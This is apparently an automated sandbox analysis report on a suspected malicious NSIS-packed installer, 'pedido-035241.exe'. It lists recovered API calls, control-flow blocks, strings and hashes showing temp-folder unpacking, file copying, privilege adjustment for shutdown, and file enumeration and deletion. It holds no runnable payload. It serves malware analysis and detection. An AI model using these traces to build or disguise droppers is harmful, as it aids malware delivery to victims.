• CharNextW.USER32(00000000,"C:\Users\user\Desktop\pedido-035241.exe",00000020,"C:\Users\user\Desktop\pedido-035241.exe",00000000), ref: 004036A0
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
• DeleteFileW.KERNELBASE(1033), ref: 00403839
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pedido-035241.exe",00000000,?), ref: 00403920
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pedido-035241.exe",00000000,?), ref: 0040392F
  • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pedido-035241.exe",00000000,?), ref: 0040393A
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pedido-035241.exe",00000000,?), ref: 00403946
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
• DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
• CopyFileW.KERNEL32(C:\Users\user\Desktop\pedido-035241.exe,00420EC8,00000001), ref: 004039D8
• CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
• OleUninitialize.OLE32(?), ref: 00403A28
• ExitProcess.KERNEL32 ref: 00403A42
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
• OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
• ExitProcess.KERNEL32 ref: 00403AD6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
• String ID: "C:\Users\user\Desktop\pedido-035241.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene$C:\Users\user\Desktop$C:\Users\user\Desktop\pedido-035241.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                            • API String ID: 3859024572-665511647
                                                                                                                                                                            • Opcode ID: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                                                                                                                                                                            • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                                                                                                                                                            • Opcode Fuzzy Hash: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 143 4056a8-4056c3 144 405852-405859 143->144 145 4056c9-405790 GetDlgItem * 3 call 404498 call 404df1 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405883-405890 144->147 148 40585b-40587d GetDlgItem CreateThread CloseHandle 144->148 167 405792-4057ac SendMessageW * 2 145->167 168 4057ae-4057b1 145->168 150 405892-405898 147->150 151 4058ae-4058b8 147->151 148->147 155 4058d3-4058dc call 4044ca 150->155 156 40589a-4058a9 ShowWindow * 2 call 404498 150->156 152 4058ba-4058c0 151->152 153 40590e-405912 151->153 157 4058c2-4058ce call 40443c 152->157 158 4058e8-4058f8 ShowWindow 152->158 153->155 161 405914-40591a 153->161 164 4058e1-4058e5 155->164 156->151 157->155 165 405908-405909 call 40443c 158->165 166 4058fa-405903 call 405569 158->166 161->155 169 40591c-40592f SendMessageW 161->169 165->153 166->165 167->168 172 4057c1-4057d8 call 404463 168->172 173 4057b3-4057bf SendMessageW 168->173 174 405a31-405a33 169->174 175 405935-405960 CreatePopupMenu call 406544 AppendMenuW 169->175 182 4057da-4057ee ShowWindow 172->182 183 40580e-40582f GetDlgItem SendMessageW 172->183 173->172 174->164 180 405962-405972 GetWindowRect 175->180 181 405975-40598a TrackPopupMenu 175->181 180->181 181->174 184 405990-4059a7 181->184 185 4057f0-4057fb ShowWindow 182->185 186 4057fd 182->186 183->174 187 405835-40584d SendMessageW * 2 183->187 188 4059ac-4059c7 SendMessageW 184->188 189 405803-405809 call 404498 185->189 186->189 187->174 188->188 190 4059c9-4059ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 4059ee-405a15 SendMessageW 190->192 192->192 193 405a17-405a2b GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405706
• GetDlgItem.USER32(?,000003EE), ref: 00405715
• GetClientRect.USER32(?,?), ref: 00405752
• GetSystemMetrics.USER32(00000002), ref: 00405759
• SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
• ShowWindow.USER32(?,00000008), ref: 004057F5
• GetDlgItem.USER32(?,000003EC), ref: 00405816
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
• GetDlgItem.USER32(?,000003F8), ref: 00405724
  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
• GetDlgItem.USER32(?,000003EC), ref: 00405868
• CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
• CloseHandle.KERNELBASE(00000000), ref: 0040587D
• ShowWindow.USER32(00000000), ref: 004058A1
• ShowWindow.USER32(?,00000008), ref: 004058A6
• ShowWindow.USER32(00000008), ref: 004058F0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
• CreatePopupMenu.USER32 ref: 00405935
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
• GetWindowRect.USER32(?,?), ref: 00405969
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
• OpenClipboard.USER32(00000000), ref: 004059CA
• EmptyClipboard.USER32 ref: 004059D0
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
• GlobalLock.KERNEL32(00000000), ref: 004059E6
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
• GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
• SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
• CloseClipboard.USER32 ref: 00405A2B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
• Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
• Opcode Fuzzy Hash: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
• Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 500 405c13-405c39 call 405ede 503 405c52-405c59 500->503 504 405c3b-405c4d DeleteFileW 500->504 506 405c5b-405c5d 503->506 507 405c6c-405c7c call 406507 503->507 505 405dcf-405dd3 504->505 508 405c63-405c66 506->508 509 405d7d-405d82 506->509 513 405c8b-405c8c call 405e22 507->513 514 405c7e-405c89 lstrcatW 507->514 508->507 508->509 509->505 512 405d84-405d87 509->512 515 405d91-405d99 call 40683d 512->515 516 405d89-405d8f 512->516 517 405c91-405c95 513->517 514->517 515->505 524 405d9b-405daf call 405dd6 call 405bcb 515->524 516->505 520 405ca1-405ca7 lstrcatW 517->520 521 405c97-405c9f 517->521 523 405cac-405cc8 lstrlenW FindFirstFileW 520->523 521->520 521->523 525 405d72-405d76 523->525 526 405cce-405cd6 523->526 540 405db1-405db4 524->540 541 405dc7-405dca call 405569 524->541 525->509 528 405d78 525->528 529 405cf6-405d0a call 406507 526->529 530 405cd8-405ce0 526->530 528->509 542 405d21-405d2c call 405bcb 529->542 543 405d0c-405d14 529->543 533 405ce2-405cea 530->533 534 405d55-405d65 FindNextFileW 530->534 533->529 539 405cec-405cf4 533->539 534->526 538 405d6b-405d6c FindClose 534->538 538->525 539->529 539->534 540->516 544 405db6-405dc5 call 405569 call 4062c7 540->544 541->505 553 405d4d-405d50 call 405569 542->553 554 405d2e-405d31 542->554 543->534 545 405d16-405d1f call 405c13 543->545 544->505 545->534 553->534 557 405d33-405d43 call 405569 call 4062c7 554->557 558 405d45-405d4b 554->558 557->534 558->534
APIs
• DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
• lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C84
• lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CA7
• lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
• FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
• FindClose.KERNEL32(00000000), ref: 00405D6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-4130279798
• Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
• Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
• Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
• Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
Control-flow graph data (interactive graph not reproduced): entry block 0x406bfe, basic blocks spanning 0x406a82-0x4074a0. Blocks that call APIs: 0x406b03 GlobalFree, 0x406b0c GlobalAlloc, 0x406b7a GlobalFree, 0x406b83 GlobalAlloc. These allocator calls appear only in the graph blocks; no APIs listing is recorded for this function.
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                            • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                                                                                                                                                            • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                            • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406854
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same nine companion dumps listed for the function above (image regions 00400000, 00408000, 0040A000, 00422000, 00427000, 0042C000, 00434000, 00450000, 00454000)
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID: XgB
                                                                                                                                                                            • API String ID: 2295610775-796949446
                                                                                                                                                                            • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                            • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                                                                                                                                                            • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Control-flow Graph
Control-flow graph data (interactive graph not reproduced): entry block 0x403f64, basic blocks spanning 0x403f64-0x404439. The same address, 00403F64, is passed to DialogBoxParamW at 00403E3F in the function listed below, consistent with this function being that dialog's procedure. Blocks that call APIs: 0x403f93 SetWindowPos; 0x403faf ShowWindow; 0x403fcf GetWindowLongW; 0x403fe8 ShowWindow; 0x403ff9 DestroyWindow; 0x404015 SetWindowLongW; 0x404032 GetDlgItem; 0x404043 SendMessageW, IsWindowEnabled; 0x4040b4 SendMessageW; 0x4040ee GetDlgItem (x2), SetClassLongW; 0x404164 SendMessageW; 0x4041db GetDlgItem; 0x404232 ShowWindow, KiUserCallbackDispatcher, EnableWindow; 0x404275 GetSystemMenu, EnableMenuItem, SendMessageW; 0x4042a5 SendMessageW; 0x4042be lstrlenW, SetWindowTextW; 0x40432e DestroyWindow; 0x404348 CreateDialogParamW; 0x40437b GetDlgItem, GetWindowRect, ScreenToClient, SetWindowPos; 0x4043d4 ShowWindow; 0x4043ee DestroyWindow, EndDialog; 0x40441d ShowWindow.
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00403FC0
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                                                                                                                                                            • DestroyWindow.USER32 ref: 00403FFF
                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00404037
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004040FD
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404107
                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404121
                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404218
                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404239
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00404266
                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00404283
                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                                                                                                                                            • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                                                                                                                                                            • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404420
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same nine companion dumps listed for the first function above (image regions 00400000, 00408000, 0040A000, 00422000, 00427000, 0042C000, 00434000, 00450000, 00454000)
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 121052019-0
                                                                                                                                                                            • Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                            • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                                                                                                                                            • Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Control-flow Graph
Control-flow graph data (interactive graph not reproduced): entry block 0x403bb6, basic blocks spanning 0x403bb6-0x403e8b. Blocks that call APIs: 0x403c31 lstrcatW; 0x403cb6 lstrlenW; 0x403cc4 lstrcmpiW; 0x403cd4 GetFileAttributesW; 0x403d0d LoadImageW; 0x403d34 RegisterClassW; 0x403d6a SystemParametersInfoW, CreateWindowExW; 0x403dd6 ShowWindow; 0x403dfc GetClassInfoW; 0x403e10 GetClassInfoW, RegisterClassW; 0x403e26 DialogBoxParamW.
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                              • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
• lstrcatW.KERNEL32(1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C37
• lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403CB7
• lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
• GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner), ref: 00403D1E
  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
• RegisterClassW.USER32(004291C0), ref: 00403D5B
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
• ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
• GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
• GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
• RegisterClassW.USER32(004291C0), ref: 00403E20
• DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-1964700046

Control-flow Graph: function starting at 0040307D (graph image not preserved; basic blocks were marked Executed / Not Executed)
APIs
• GetTickCount.KERNEL32 ref: 0040308E
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\pedido-035241.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
  • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
  • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
• GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pedido-035241.exe,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
• GlobalAlloc.KERNEL32(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\pedido-035241.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 2803837635-2970656598

Control-flow Graph: function starting at 00406544 (graph image not preserved; basic blocks were marked Executed / Not Executed)
APIs
• GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
• GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
• lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
